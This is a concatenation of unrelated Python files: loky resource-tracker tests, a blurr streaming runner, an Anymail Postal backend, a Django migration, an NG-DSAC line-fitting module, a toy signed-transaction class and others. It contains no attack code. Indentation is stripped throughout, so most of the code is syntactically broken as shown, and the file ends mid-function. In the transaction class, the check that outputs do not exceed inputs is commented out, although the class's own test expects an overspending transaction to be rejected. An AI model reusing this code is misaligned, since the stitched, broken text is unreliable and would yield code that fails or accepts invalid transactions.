Method._Class = ClassUtils.fromFullyQualifiedName(class_name)
if(not Method._Class):
print("Failed to find Method class")
Method._getName = GetMethodID(Method._Class.getClass(), "getName", "()Ljava/lang/String;")
if(not Method._getName):
print("Failed to find getName")
Method._getReturnType = GetMethodID(Method._Class.getClass(), "getReturnType", "()Ljava/lang/Class;")
if(not Method._getReturnType):
print("Failed to find getReturnType")
Method._isInit = True
def __del__(self):
Modifier.Modifier.__del__(self)
Executable.Executable.__del__(self)
if(Method._isInit and Method._count == 1):
del(Method._Class)
Method._Class = None
Method._isInit = False
Method._count = Method._count - 1
def getName(self):
return String.String(CallObjectMethod(self.obj, Method._getName))
def getReturnType(self):
return ClassUtils.fromJclass(CallObjectMethod(self.obj, Method._getReturnType))
def descriptor(self):
desc = super(Method, self).descriptor()
ret_type = self.getReturnType().internalTypeSignature()
return desc + ret_type
|
nilq/baby-python
|
python
|
"""Tests for the ResourceTracker class"""
import errno
import gc
import os
import pytest
import re
import signal
import subprocess
import sys
import time
import warnings
import weakref
from loky import ProcessPoolExecutor
import loky.backend.resource_tracker as resource_tracker
from loky.backend.context import get_context
from .utils import resource_unlink, create_resource, resource_exists
def _resource_unlink(name, rtype):
resource_tracker._CLEANUP_FUNCS[rtype](name)
def get_rtracker_pid():
resource_tracker.ensure_running()
return resource_tracker._resource_tracker._pid
class TestResourceTracker:
@pytest.mark.parametrize("rtype", ["file", "folder", "semlock"])
def test_resource_utils(self, rtype):
        # Check that the resource utils work as expected in the main process
if sys.platform == "win32" and rtype == "semlock":
pytest.skip("no semlock on windows")
name = create_resource(rtype)
assert resource_exists(name, rtype)
resource_unlink(name, rtype)
assert not resource_exists(name, rtype)
def test_child_retrieves_resource_tracker(self):
parent_rtracker_pid = get_rtracker_pid()
executor = ProcessPoolExecutor(max_workers=2)
child_rtracker_pid = executor.submit(get_rtracker_pid).result()
# First simple pid retrieval check (see #200)
assert child_rtracker_pid == parent_rtracker_pid
# Register a resource in the parent process, and un-register it in the
# child process. If the two processes do not share the same
# resource_tracker, a cache KeyError should be printed in stderr.
cmd = '''if 1:
import os, sys
from loky import ProcessPoolExecutor
from loky.backend import resource_tracker
from tempfile import NamedTemporaryFile
tmpfile = NamedTemporaryFile(delete=False)
tmpfile.close()
filename = tmpfile.name
resource_tracker.VERBOSE = True
resource_tracker.register(filename, "file")
def maybe_unlink(name, rtype):
# resource_tracker.maybe_unlink is actually a bound method of the
# ResourceTracker. We need a custom wrapper to avoid object
# serialization.
from loky.backend import resource_tracker
resource_tracker.maybe_unlink(name, rtype)
print(filename)
e = ProcessPoolExecutor(1)
e.submit(maybe_unlink, filename, "file").result()
e.shutdown()
'''
try:
p = subprocess.run([sys.executable, '-E', '-c', cmd],
capture_output=True,
text=True)
filename = p.stdout.strip()
pattern = f"decremented refcount of file {filename}"
assert pattern in p.stderr
assert "leaked" not in p.stderr
pattern = f"KeyError: '{filename}'"
assert pattern not in p.stderr
finally:
executor.shutdown()
# The following four tests are inspired from cpython _test_multiprocessing
@pytest.mark.parametrize("rtype", ["file", "folder", "semlock"])
def test_resource_tracker(self, rtype):
#
# Check that killing process does not leak named resources
#
if (sys.platform == "win32") and rtype == "semlock":
pytest.skip("no semlock on windows")
cmd = f'''if 1:
import time, os, tempfile, sys
from loky.backend import resource_tracker
from utils import create_resource
for _ in range(2):
rname = create_resource("{rtype}")
resource_tracker.register(rname, "{rtype}")
# give the resource_tracker time to register the new resource
time.sleep(0.5)
sys.stdout.write(f"{{rname}}\\n")
sys.stdout.flush()
time.sleep(10)
'''
env = os.environ.copy()
env['PYTHONPATH'] = os.path.dirname(__file__)
p = subprocess.Popen([sys.executable, '-c', cmd],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
env=env,
text=True)
name1 = p.stdout.readline().rstrip()
name2 = p.stdout.readline().rstrip()
# subprocess holding a reference to lock1 is still alive, so this call
# should succeed
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
# wait for the resource_tracker to cleanup the leaked resources
time.sleep(2.0)
with pytest.raises(OSError) as ctx:
_resource_unlink(name2, rtype)
# docs say it should be ENOENT, but OSX seems to give EINVAL
assert ctx.value.errno in (errno.ENOENT, errno.EINVAL)
err = p.stderr.read()
p.stderr.close()
p.stdout.close()
expected = (f'resource_tracker: There appear to be 2 leaked {rtype}')
assert re.search(expected, err) is not None
# resource 1 is still registered, but was destroyed externally: the
# tracker is expected to complain.
if sys.platform == "win32":
errno_map = {'file': 2, 'folder': 3}
expected = (
f"resource_tracker: {re.escape(name1)}: "
f"(WindowsError\\(({errno_map[rtype]})|FileNotFoundError)"
)
else:
expected = (
f"resource_tracker: {re.escape(name1)}: "
f"(OSError\\({errno.ENOENT}|FileNotFoundError)"
)
assert re.search(expected, err) is not None
@pytest.mark.parametrize("rtype", ["file", "folder", "semlock"])
def test_resource_tracker_refcounting(self, rtype):
if sys.platform == "win32" and rtype == "semlock":
pytest.skip("no semlock on windows")
cmd = f'''if 1:
import os
import tempfile
import time
from loky.backend import resource_tracker
from utils import resource_unlink, create_resource, resource_exists
resource_tracker.VERBOSE = True
try:
name = create_resource("{rtype}")
assert resource_exists(name, "{rtype}")
from loky.backend.resource_tracker import _resource_tracker
_resource_tracker.register(name, "{rtype}")
_resource_tracker.register(name, "{rtype}")
# Forget all information about the resource, but do not try to
# remove it
_resource_tracker.unregister(name, "{rtype}")
time.sleep(1)
assert resource_exists(name, "{rtype}")
_resource_tracker.register(name, "{rtype}")
_resource_tracker.register(name, "{rtype}")
_resource_tracker.maybe_unlink(name, "{rtype}")
time.sleep(1)
assert resource_exists(name, "{rtype}")
_resource_tracker.maybe_unlink(name, "{rtype}")
for _ in range(100):
if not resource_exists(name, "{rtype}"):
break
time.sleep(.1)
else:
raise AssertionError(f"{{name}} was not unlinked in time")
finally:
try:
if resource_exists(name, "{rtype}"):
resource_unlink(name, "{rtype}")
except NameError:
# "name" is not defined because create_resource has failed
pass
'''
env = {**os.environ, 'PYTHONPATH': os.path.dirname(__file__)}
p = subprocess.run([sys.executable, '-c', cmd],
capture_output=True,
env=env)
assert p.returncode == 0, p.stderr
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from loky.backend.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
os.waitpid(pid, 0)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = get_context("loky")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
# remove unrelated MacOS warning messages first
warnings.filterwarnings(
"ignore", message='semaphore are broken on OSX')
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the resource_tracker
del sem
gc.collect()
assert wr() is None
if should_die:
assert len(all_warn) == 1
the_warn = all_warn[0]
assert issubclass(the_warn.category, UserWarning)
assert "resource_tracker: process died" in str(
the_warn.message)
else:
assert len(all_warn) == 0
@pytest.mark.skipif(sys.platform == "win32",
reason="Limited signal support on Windows")
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by resource tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
@pytest.mark.skipif(sys.platform == "win32",
reason="Limited signal support on Windows")
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by resource tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
@pytest.mark.skipif(sys.platform == "win32",
reason="Limited signal support on Windows")
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@pytest.mark.skipif(sys.version_info < (3, 8),
reason="SharedMemory introduced in Python 3.8")
def test_loky_process_inherit_multiprocessing_resource_tracker(self):
cmd = '''if 1:
from loky import get_reusable_executor
from multiprocessing.shared_memory import SharedMemory
from multiprocessing.resource_tracker import (
_resource_tracker as mp_resource_tracker
)
def mp_rtracker_getattrs():
from multiprocessing.resource_tracker import (
_resource_tracker as mp_resource_tracker
)
return mp_resource_tracker._fd, mp_resource_tracker._pid
if __name__ == '__main__':
executor = get_reusable_executor(max_workers=1)
# warm up
f = executor.submit(id, 1).result()
# loky forces the creation of the resource tracker at process
# creation so that loky processes can inherit its file descriptor.
fd, pid = executor.submit(mp_rtracker_getattrs).result()
assert fd == mp_resource_tracker._fd
assert pid == mp_resource_tracker._pid
# non-regression test for #242: unlinking in a loky process a
# shared_memory segment tracked by multiprocessing and created its
# parent should not generate warnings.
shm = SharedMemory(create=True, size=10)
f = executor.submit(shm.unlink).result()
'''
p = subprocess.run([sys.executable, '-c', cmd],
capture_output=True, text=True)
assert not p.stdout
assert not p.stderr
|
nilq/baby-python
|
python
|
from abc import ABC, abstractmethod
from datetime import datetime
from typing import List, Optional, Tuple, Any, Dict, Iterable, Generator
import yaml
from smart_open import smart_open
from blurr.core import logging
from blurr.core.aggregate_block import BlockAggregate, TimeAggregate
from blurr.core.errors import PrepareWindowMissingBlocksError
from blurr.core.evaluation import Context
from blurr.core.record import Record
from blurr.core.schema_loader import SchemaLoader
from blurr.core.store import Store
from blurr.core.store_key import Key
from blurr.core.transformer_streaming import StreamingTransformer, StreamingTransformerSchema
from blurr.core.transformer_window import WindowTransformer
from blurr.core.type import Type
from blurr.runner.data_processor import DataProcessor
TimeAndRecord = Tuple[datetime, Record]
class Runner(ABC):
"""
    An abstract class that provides functionality to:
    - Convert raw events into Records
    - Process a list of Records for a user.
    A class that inherits from Runner should do the following:
    1. Call `get_per_identity_records()` using an iterator of the events available. This returns
    a generator which creates a Tuple[Identity, TimeAndRecord] output.
    2. The Tuple[Identity, TimeAndRecord] output should be grouped together by the
    Identity to create a List of TimeAndRecord per identity.
    3. Using the per identity list of TimeAndRecord, `execute_per_identity_records()`
    should be called.
    - This returns Tuple[Identity, Tuple[Streaming BTS State, List of Window BTS output]].
    - `execute_per_identity_records()` can take an existing old_state (old Streaming BTS
    State) so as to allow batch execution to make use of previous output.
"""
def __init__(self, stream_bts_file: str, window_bts_file: Optional[str]):
self._stream_bts = yaml.safe_load(smart_open(stream_bts_file))
self._window_bts = None if window_bts_file is None else yaml.safe_load(
smart_open(window_bts_file))
# TODO: Assume validation will be done separately.
# This causes a problem when running the code on spark
# as the validation yml file is inside the archived package
# and yamale is not able to read that.
# validate_schema_spec(self._stream_bts)
# if self._window_bts is not None:
# validate_schema_spec(self._window_bts)
def execute_per_identity_records(
self,
identity: str,
records: List[TimeAndRecord],
old_state: Optional[Dict[Key, Any]] = None) -> Tuple[str, Tuple[Dict, List]]:
"""
        Executes the streaming and window BTS on the given records. An optional old state can be provided
which initializes the state for execution. This is useful for batch execution where the
previous state is written out to storage and can be loaded for the next batch run.
:param identity: Identity of the records.
:param records: List of TimeAndRecord to be processed.
:param old_state: Streaming BTS state dictionary from a previous execution.
        :return: Tuple[Identity, Tuple[Streaming BTS state dictionary,
        List of window BTS output]].
"""
schema_loader = SchemaLoader()
if records:
records.sort(key=lambda x: x[0])
else:
records = []
block_data = self._execute_stream_bts(records, identity, schema_loader, old_state)
window_data = self._execute_window_bts(identity, schema_loader)
return identity, (block_data, window_data)
def get_per_identity_records(self, events: Iterable, data_processor: DataProcessor
) -> Generator[Tuple[str, TimeAndRecord], None, None]:
"""
        Uses the given iterable events and the data processor to convert each event into a list of
        Records along with its identity and time.
        :param events: iterable events.
        :param data_processor: DataProcessor to process each event in events.
        :return: yields Tuple[Identity, TimeAndRecord] for all Records in events.
"""
schema_loader = SchemaLoader()
stream_bts_name = schema_loader.add_schema_spec(self._stream_bts)
stream_transformer_schema: StreamingTransformerSchema = schema_loader.get_schema_object(
stream_bts_name)
for event in events:
try:
for record in data_processor.process_data(event):
try:
id = stream_transformer_schema.get_identity(record)
time = stream_transformer_schema.get_time(record)
yield (id, (time, record))
except Exception as err:
logging.error('{} in parsing Record {}.'.format(err, record))
except Exception as err:
logging.error('{} in parsing Event {}.'.format(err, event))
def _execute_stream_bts(self,
identity_events: List[TimeAndRecord],
identity: str,
schema_loader: SchemaLoader,
old_state: Optional[Dict] = None) -> Dict[Key, Any]:
if self._stream_bts is None:
return {}
stream_bts_name = schema_loader.add_schema_spec(self._stream_bts)
stream_transformer_schema = schema_loader.get_schema_object(stream_bts_name)
store = self._get_store(schema_loader)
if old_state:
for k, v in old_state.items():
store.save(k, v)
if identity_events:
stream_transformer = StreamingTransformer(stream_transformer_schema, identity)
for time, event in identity_events:
stream_transformer.run_evaluate(event)
stream_transformer.run_finalize()
return self._get_store(schema_loader).get_all(identity)
def _execute_window_bts(self, identity: str, schema_loader: SchemaLoader) -> List[Dict]:
if self._window_bts is None:
logging.debug('Window BTS not provided')
return []
stream_transformer = StreamingTransformer(
self._get_streaming_transformer_schema(schema_loader), identity)
all_data = self._get_store(schema_loader).get_all(identity)
stream_transformer.run_restore(all_data)
exec_context = Context()
exec_context.add(stream_transformer._schema.name, stream_transformer)
block_obj = None
for aggregate in stream_transformer._nested_items.values():
if not isinstance(aggregate, TimeAggregate):
continue
if block_obj is not None:
                raise Exception('Window operation is supported against Streaming '
                                'BTS with only one BlockAggregate')
block_obj = aggregate
if block_obj is None:
raise Exception('No BlockAggregate found in the Streaming BTS file')
window_data = []
window_bts_name = schema_loader.add_schema_spec(self._window_bts)
window_transformer_schema = schema_loader.get_schema_object(window_bts_name)
window_transformer = WindowTransformer(window_transformer_schema, identity, exec_context)
logging.debug('Running Window BTS for identity {}'.format(identity))
anchors = 0
blocks = 0
for key, data in all_data.items():
if key.group != block_obj._schema.name:
continue
try:
blocks += 1
if window_transformer.run_evaluate(block_obj.run_restore(data)):
anchors += 1
window_data.append(window_transformer.run_flattened_snapshot)
except PrepareWindowMissingBlocksError as err:
logging.debug('{} with {}'.format(err, key))
if anchors == 0:
logging.debug('No anchors found for identity {} out of {} blocks'.format(
identity, blocks))
return window_data
@staticmethod
def _get_store(schema_loader: SchemaLoader) -> Store:
stores = schema_loader.get_all_stores()
if not stores:
fq_name_and_schema = schema_loader.get_schema_specs_of_type(
Type.BLURR_STORE_DYNAMO, Type.BLURR_STORE_MEMORY)
return schema_loader.get_store(next(iter(fq_name_and_schema)))
return stores[0]
@staticmethod
def _get_streaming_transformer_schema(
schema_loader: SchemaLoader) -> StreamingTransformerSchema:
fq_name_and_schema = schema_loader.get_schema_specs_of_type(Type.BLURR_TRANSFORM_STREAMING)
return schema_loader.get_schema_object(next(iter(fq_name_and_schema)))
    @abstractmethod
    def execute(self, *args, **kwargs):
        raise NotImplementedError('execute must be implemented')
    @abstractmethod
    def write_output_file(self, *args, **kwargs):
        raise NotImplementedError('write_output_file must be implemented')
    @abstractmethod
    def print_output(self, *args, **kwargs):
        raise NotImplementedError('print_output must be implemented')
|
nilq/baby-python
|
python
|
from .base_requests import AnymailRequestsBackend, RequestsPayload
from ..exceptions import AnymailRequestsAPIError
from ..message import AnymailRecipientStatus
from ..utils import get_anymail_setting
class EmailBackend(AnymailRequestsBackend):
"""
Postal v1 API Email Backend
"""
esp_name = "Postal"
def __init__(self, **kwargs):
"""Init options from Django settings"""
esp_name = self.esp_name
self.api_key = get_anymail_setting(
"api_key", esp_name=esp_name, kwargs=kwargs, allow_bare=True
)
# Required, as there is no hosted instance of Postal
api_url = get_anymail_setting("api_url", esp_name=esp_name, kwargs=kwargs)
if not api_url.endswith("/"):
api_url += "/"
super().__init__(api_url, **kwargs)
def build_message_payload(self, message, defaults):
return PostalPayload(message, defaults, self)
def parse_recipient_status(self, response, payload, message):
parsed_response = self.deserialize_json_response(response, payload, message)
if parsed_response["status"] != "success":
raise AnymailRequestsAPIError(
email_message=message, payload=payload, response=response, backend=self
)
# If we get here, the send call was successful.
messages = parsed_response["data"]["messages"]
return {
email: AnymailRecipientStatus(message_id=details["id"], status="queued")
for email, details in messages.items()
}
class PostalPayload(RequestsPayload):
def __init__(self, message, defaults, backend, *args, **kwargs):
http_headers = kwargs.pop("headers", {})
http_headers["X-Server-API-Key"] = backend.api_key
http_headers["Content-Type"] = "application/json"
http_headers["Accept"] = "application/json"
super().__init__(
message, defaults, backend, headers=http_headers, *args, **kwargs
)
def get_api_endpoint(self):
return "api/v1/send/message"
def init_payload(self):
self.data = {}
def serialize_data(self):
return self.serialize_json(self.data)
def set_from_email(self, email):
self.data["from"] = str(email)
def set_subject(self, subject):
self.data["subject"] = subject
def set_to(self, emails):
self.data["to"] = [str(email) for email in emails]
def set_cc(self, emails):
self.data["cc"] = [str(email) for email in emails]
def set_bcc(self, emails):
self.data["bcc"] = [str(email) for email in emails]
def set_reply_to(self, emails):
if len(emails) > 1:
self.unsupported_feature("multiple reply_to addresses")
if len(emails) > 0:
self.data["reply_to"] = str(emails[0])
def set_extra_headers(self, headers):
self.data["headers"] = headers
def set_text_body(self, body):
self.data["plain_body"] = body
def set_html_body(self, body):
if "html_body" in self.data:
self.unsupported_feature("multiple html parts")
self.data["html_body"] = body
def make_attachment(self, attachment):
"""Returns Postal attachment dict for attachment"""
att = {
"name": attachment.name or "",
"data": attachment.b64content,
"content_type": attachment.mimetype,
}
if attachment.inline:
# see https://github.com/postalhq/postal/issues/731
# but it might be possible with the send/raw endpoint
self.unsupported_feature('inline attachments')
return att
def set_attachments(self, attachments):
if attachments:
self.data["attachments"] = [
self.make_attachment(attachment) for attachment in attachments
]
def set_envelope_sender(self, email):
self.data["sender"] = str(email)
def set_tags(self, tags):
if len(tags) > 1:
self.unsupported_feature("multiple tags")
if len(tags) > 0:
self.data["tag"] = tags[0]
def set_esp_extra(self, extra):
self.data.update(extra)
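# --- Illustrative configuration sketch (not part of the original module). ---
# A minimal Django settings snippet for this backend, assuming the module
# lives at anymail.backends.postal; the setting names follow Anymail's usual
# ESP convention and the values below are placeholders.
#
# EMAIL_BACKEND = "anymail.backends.postal.EmailBackend"
# ANYMAIL = {
#     "POSTAL_API_KEY": "<your server API key>",
#     "POSTAL_API_URL": "https://postal.example.com",  # required: no hosted instance
# }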
|
nilq/baby-python
|
python
|
# encoding: utf-8
# module NationalInstruments.RFmx calls itself RFmx
# from NationalInstruments.RFmx.InstrMX.Fx40, Version=19.1.0.49152, Culture=neutral, PublicKeyToken=dc6ad606294fc298
# by generator 1.145
# no doc
# no imports
# no functions
# no classes
# variables with complex values
|
nilq/baby-python
|
python
|
from ..mime import GlueMimeListWidget, LAYERS_MIME_TYPE
class TestGlueMimeListWidget(object):
def setup_method(self, method):
self.w = GlueMimeListWidget()
def test_mime_type(self):
assert self.w.mimeTypes() == [LAYERS_MIME_TYPE]
def test_mime_data(self):
self.w.set_data(3, 'test data')
self.w.set_data(4, 'do not pick')
mime = self.w.mimeData([3])
        assert mime.data(LAYERS_MIME_TYPE) == ['test data']
def test_mime_data_multiselect(self):
self.w.set_data(3, 'test data')
self.w.set_data(4, 'also pick')
mime = self.w.mimeData([3, 4])
        assert mime.data(LAYERS_MIME_TYPE) == ['test data', 'also pick']
|
nilq/baby-python
|
python
|
# Generated by Django 2.0.5 on 2018-05-07 13:56
import django.contrib.postgres.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Ticket',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254)),
('name', models.TextField()),
('kw', models.IntegerField()),
('year', models.IntegerField()),
('entry_date', models.TimeField(auto_now_add=True)),
('edited', models.TimeField(auto_now=True)),
('availability', django.contrib.postgres.fields.ArrayField(base_field=models.CharField(choices=[('1', 'Monday'), ('2', 'Tuesday'), ('3', 'Wednesday'), ('4', 'Thursday'), ('5', 'Friday')], max_length=1), size=None)),
],
),
]
|
nilq/baby-python
|
python
|
import torch
import torch.nn.functional as F
import random
class NGDSAC:
'''
Neural-Guided DSAC to robustly fit lines.
'''
def __init__(self, hyps, inlier_thresh, inlier_beta, inlier_alpha, loss_function, invalid_loss):
'''
Constructor.
hyps -- number of line hypotheses sampled for each image
		inlier_thresh -- threshold used in the soft inlier count, it's measured in relative image size
inlier_beta -- scaling factor within the sigmoid of the soft inlier count
inlier_alpha -- scaling factor for the soft inlier scores (controls the peakiness of the hypothesis distribution)
loss_function -- function to compute the quality of estimated line parameters wrt ground truth
invalid_loss -- punishment when sampling invalid hypothesis
'''
self.hyps = hyps
self.inlier_thresh = inlier_thresh
self.inlier_beta = inlier_beta
self.inlier_alpha = inlier_alpha
self.loss_function = loss_function
self.invalid_loss = invalid_loss
def __sample_hyp(self, x, y, p, pool):
'''
Calculate a line hypothesis (slope, intercept) from two random points.
x -- vector of x values
y -- vector of y values
p -- sampling probabilities for selecting points
pool -- indicator vector updated with which points have been selected
'''
# select points
idx = torch.multinomial(p, 2, replacement = True)
idx1 = int(idx[0])
idx2 = int(idx[1])
# set indicators which points have been selected
pool[idx1] += 1
pool[idx2] += 1
# validity check, do not choose too close together
if torch.abs(x[idx1] - x[idx2]) < 0.05:
return 0, 0, False # no valid hypothesis found, indicated by False
# calculate line parameters
slope = (y[idx1] - y[idx2]) / (x[idx1] - x[idx2])
intercept = y[idx1] - slope * x[idx1]
		return slope, intercept, True # True indicates a valid hypothesis
def __soft_inlier_count(self, slope, intercept, x, y):
'''
Soft inlier count for a given line and a given set of points.
slope -- slope of the line
intercept -- intercept of the line
x -- vector of x values
y -- vector of y values
'''
# point line distances
dists = torch.abs(slope * x - y + intercept)
dists = dists / torch.sqrt(slope * slope + 1)
# soft inliers
dists = 1 - torch.sigmoid(self.inlier_beta * (dists - self.inlier_thresh))
score = torch.sum(dists)
return score, dists
def __call__(self, prediction, log_probs, labels, xStart, xEnd, imh):
'''
Perform robust, differentiable line fitting according to NG-DSAC.
Returns the expected loss and hypothesis distribution entropy.
Expected loss can be used for backprob, entropy for monitoring / debugging.
prediction -- predicted 2D points for a batch of images, array of shape (Bx2xN) where
B is the number of images in the batch
2 is the number of point dimensions (y, x)
N is the number of predicted points
log_probs -- log of selection probabilities, array of shape (BxN)
labels -- ground truth labels for the batch, array of shape (Bx2) where
2 is the number of parameters (intercept, slope)
xStart -- x-values where each ground truth line starts (for calculating the loss), array of shape (B)
xEnd -- x-values where each ground truth line ends (for calculating the loss), array of shape (B)
imh -- relative height of the image (for calculating the loss), <= 1, array of shape (B)
'''
# faster on CPU because of many, small matrices
prediction = prediction.cpu()
batch_size = prediction.size(0)
avg_exp_loss = 0 # expected loss
avg_entropy = 0 # hypothesis distribution entropy
self.est_parameters = torch.zeros(batch_size, 2) # estimated lines (w/ max inliers)
self.batch_inliers = torch.zeros(batch_size, prediction.size(2)) # (soft) inliers for estimated lines
self.g_log_probs = torch.zeros(batch_size, prediction.size(2)) # gradient tensor for neural guidance
for b in range(0, batch_size):
hyp_losses = torch.zeros([self.hyps, 1]) # loss of each hypothesis
hyp_scores = torch.zeros([self.hyps, 1]) # score of each hypothesis
max_score = 0 # score of best hypothesis
y = prediction[b, 0] # all y-values of the prediction
			x = prediction[b, 1] # all x-values of the prediction
p = torch.exp(log_probs[b]) # selection probabilities for points
for h in range(0, self.hyps):
# === step 1: sample hypothesis ===========================
slope, intercept, valid = self.__sample_hyp(x, y, p, self.g_log_probs[b])
if not valid:
hyp_losses[h] = self.invalid_loss
hyp_scores[h] = 0.0001
continue # skip other steps for invalid hyps
# === step 2: score hypothesis using soft inlier count ====
score, inliers = self.__soft_inlier_count(slope, intercept, x, y)
hyp = torch.zeros([2])
hyp[1] = slope
hyp[0] = intercept
# === step 3: calculate loss of hypothesis ================
loss = self.loss_function(hyp, labels[b], xStart[b], xEnd[b], imh[b])
# store results
hyp_losses[h] = loss
hyp_scores[h] = score
# keep track of best hypothesis so far
if score > max_score:
max_score = score
self.est_parameters[b] = hyp.detach()
self.batch_inliers[b] = inliers.detach()
# === step 4: calculate the expectation ===========================
#softmax distribution from hypotheses scores
			hyp_scores = F.softmax(self.inlier_alpha * hyp_scores, 0)
			# expectation of loss
			avg_exp_loss += torch.sum(hyp_losses * hyp_scores)
			# entropy of the hypothesis distribution (for monitoring), which
			# the docstring above promises to return alongside the loss
			avg_entropy += torch.distributions.Categorical(probs=hyp_scores.squeeze()).entropy()
		return avg_exp_loss / batch_size, avg_entropy / batch_size
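# --- Illustrative usage sketch (not part of the original module). ---
# A toy L1 loss on (intercept, slope) stands in for the real loss function;
# tensor shapes follow the docstring of __call__ above.
if __name__ == '__main__':
	def toy_loss(hyp, label, x_start, x_end, imh):
		return torch.abs(hyp - label).sum()
	ngdsac = NGDSAC(hyps=16, inlier_thresh=0.05, inlier_beta=100.0,
		inlier_alpha=0.5, loss_function=toy_loss, invalid_loss=1.0)
	B, N = 2, 64
	prediction = torch.rand(B, 2, N)  # predicted 2D points (y, x)
	log_probs = torch.log(torch.full((B, N), 1.0 / N))  # uniform selection probs
	labels = torch.rand(B, 2)  # ground truth (intercept, slope)
	exp_loss, entropy = ngdsac(prediction, log_probs, labels,
		torch.zeros(B), torch.ones(B), torch.ones(B))
	print(float(exp_loss), float(entropy))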
|
nilq/baby-python
|
python
|
import Signatures
class Tx:
    inputs = None # input addresses
    outputs = None # output addresses
    sigs = None # signatures
    reqd = None # required signatures that are not inputs
def __init__(self):
self.inputs = []
self.outputs = []
self.sigs = []
self.reqd = []
def add_input(self,from_addr, amount):
self.inputs.append((from_addr,amount))
def add_output(self,to_addr, amount):
self.outputs.append((to_addr,amount))
def add_reqd(self,addr):
self.reqd.append(addr)
def sign(self,private):
message = self.__gather()
newsig = Signatures.sign(message,private)
self.sigs.append(newsig)
def is_valid(self):
total_in = 0
total_out = 0
message = self.__gather()
for addr,amount in self.inputs:
found = False
for s in self.sigs:
if Signatures.verify(message,s,addr):
found = True
if not found:
return False
if amount < 0:
return False
total_in = total_in + amount
for addr in self.reqd:
found = False
for s in self.sigs:
if Signatures.verify(message,s,addr):
found = True
if not found:
return False
for addr, amount in self.outputs:
if amount <0:
return False
total_out = total_out + amount
# if total_out > total_in:
# return False
return True
def __gather(self):
data = []
data.append(self.inputs)
data.append(self.outputs)
data.append(self.reqd)
return data
def __repr__(self):
reprstr = "INPUTS:\n"
for addr, amount in self.inputs:
reprstr = reprstr + str(amount) + " from " + str(addr) + "\n"
reprstr = reprstr + "OUTPUTS:\n"
for addr, amount in self.outputs:
reprstr = reprstr + str(amount) + " to " + str(addr) + "\n"
reprstr = reprstr + "REQD:\n"
for r in self.reqd:
reprstr = reprstr + str(r) + "\n"
reprstr = reprstr + "SIGS:\n"
for s in self.sigs:
reprstr = reprstr + str(s) + "\n"
reprstr = reprstr + "END\n"
return reprstr
if __name__ == "__main__":
pr1,pu1 = Signatures.generate_keys()
pr2,pu2 = Signatures.generate_keys()
pr3,pu3 = Signatures.generate_keys()
pr4,pu4 = Signatures.generate_keys()
Tx1 = Tx()
Tx1.add_input(pu1,1)
Tx1.add_output(pu2,1)
Tx1.sign(pr1)
Tx2 = Tx()
Tx2.add_input(pu1,2)
Tx2.add_output(pu2,1)
Tx2.add_output(pu3,1)
Tx2.sign(pr1)
Tx3 = Tx()
Tx3.add_input(pu3,1.2)
Tx3.add_output(pu1,1.1)
Tx3.add_reqd(pu4)
Tx3.sign(pr3)
Tx3.sign(pr4)
for t in [Tx1,Tx2,Tx3]:
if t.is_valid():
print("Success! Tx is valid")
else:
print("Error! Tx is invalid")
#Wrong signatures
Tx4 = Tx()
Tx4.add_input(pu1,1)
Tx4.add_output(pu2,1)
Tx4.sign(pr2)
#Escrow TX not signed by arbiter
Tx5 = Tx()
Tx5.add_input(pu3,1.2)
Tx5.add_output(pu1,1.1)
Tx5.add_reqd(pu4)
Tx5.sign(pr3)
#Two input addrs, signed by one
Tx6 = Tx()
Tx6.add_input(pu3,1)
Tx6.add_input(pu4,0.1)
Tx6.add_output(pu1,1.1)
Tx6.sign(pr3)
#Outputs exceed inputs
Tx7 = Tx()
Tx7.add_input(pu4,1.2)
Tx7.add_output(pu1,1)
Tx7.add_output(pu2,2)
Tx7.sign(pr4)
#Negative Values
Tx8 = Tx()
Tx8.add_input(pu2,-1)
Tx8.add_output(pu1,-1)
Tx8.sign(pr2)
#Modified Tx
Tx9 = Tx()
Tx9.add_input(pu1,1)
Tx9.add_output(pu2,1)
Tx9.sign(pr1)
#outputs = [(pu2,1)]
#changed to outputs = [(pu3,1)]
Tx9.outputs[0]= (pu3,1)
for t in [Tx4,Tx5,Tx6,Tx7,Tx8,Tx9]:
if t.is_valid():
print("Error! Bad Tx is valid")
else:
print("Success! Bad Tx is invalid")
|
nilq/baby-python
|
python
|
from rest_framework import serializers
from rest_framework.fields import SerializerMethodField
from .models import content_choice, visibility_choice
from .models import Post as Post
from backend.settings import SITE_ADDRESS
from author.serializers import AuthorSerializer
from comment.serializers import ChoiceField, CommentSerializer
from django.http import JsonResponse
class PostsSerializer(serializers.ModelSerializer):
id = serializers.SerializerMethodField()
type = serializers.SerializerMethodField()
author = serializers.SerializerMethodField()
source = serializers.SerializerMethodField('get_source_id')
origin = serializers.SerializerMethodField('get_origin_id')
contentType = ChoiceField(choices=content_choice)
visibility = ChoiceField(choices=visibility_choice)
comments = serializers.SerializerMethodField()
count = serializers.SerializerMethodField()
class Meta:
model = Post
fields = ("type", "id", "author", "title",
"visibility","description","content", "contentType",
"source", "origin","count","categories","comments",
"unlisted","published")
def get_type(self, obj):
return "post"
def get_author(self, obj):
return AuthorSerializer(obj.author_id).data
def get_id(self, obj):
return f"{SITE_ADDRESS}author/{obj.author_id.pk}/posts/{obj.post_id}/"
def get_origin_id(self, obj):
if obj.origin:
return obj.origin
else:
return f"{SITE_ADDRESS}author/{obj.author_id.pk}/posts/{obj.post_id}/"
def get_source_id(self,obj):
if obj.source:
return obj.source
else:
